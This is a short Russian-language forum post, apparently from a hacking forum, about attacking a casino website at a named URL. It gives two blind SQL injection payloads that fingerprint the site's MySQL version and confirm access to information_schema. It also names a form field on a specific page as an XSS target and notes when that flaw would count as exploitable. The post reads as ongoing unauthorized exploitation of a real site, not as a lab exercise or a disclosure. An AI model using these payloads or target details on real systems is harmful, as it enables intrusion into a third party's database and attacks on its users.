Немного уточню, тк сидел раскручивал:
' and 1=if((select substring(version(),1,1)=4),1,(select 1 from information_schema.tables))/*
' and 1=if((select substring(version(),1,1)=5),1,(select 1 from information_schema.tables))/*

=> 5й мускул с доступом к information_schema.

XSS
http://wmcasino.org/lobby/generate.php
Поле frmName
Если нет привязки сессии к ип и не чекается реферер, тогда это можно отнести к уязвимости.